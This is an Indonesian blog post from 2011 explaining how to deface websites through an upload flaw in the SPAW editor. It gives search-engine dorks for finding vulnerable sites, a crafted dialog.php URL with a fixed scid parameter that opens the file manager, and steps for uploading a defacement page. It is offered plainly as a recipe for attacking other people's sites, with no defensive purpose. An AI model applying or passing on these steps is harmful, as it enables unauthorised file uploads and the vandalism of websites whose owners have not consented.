Rabu, 21 September 2011

deface spaw


okey… tampa basa basi lagi…. saya coba menerangkan tentang cara Deface dengan Spaw Upload Vulnerably.

Cekidot….

dorknya : inurl:”spaw2/dialogs/”  OR  inurl:”spaw2/uploads/files/”

Jika sudah dapet targetnya…
contoh targetnya : http://target.com/Admin/spaw2/uploads/files/CC%20Book/ชุดความรู้%20CC%20Vol2.pdf

bagian : spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf

GANTI DENGAN

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

MAKA HASILNYA SEPERTI INI

http://target.com/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Akan tampil halaman untuk upload File.
Ganti menjadi files pada lokasi penyimpanan.
Browse file design Deface kamu, & upload.
Apabila file sukses diupload.akan terlihat file uploadtan tadi…

0 komentar:

Posting Komentar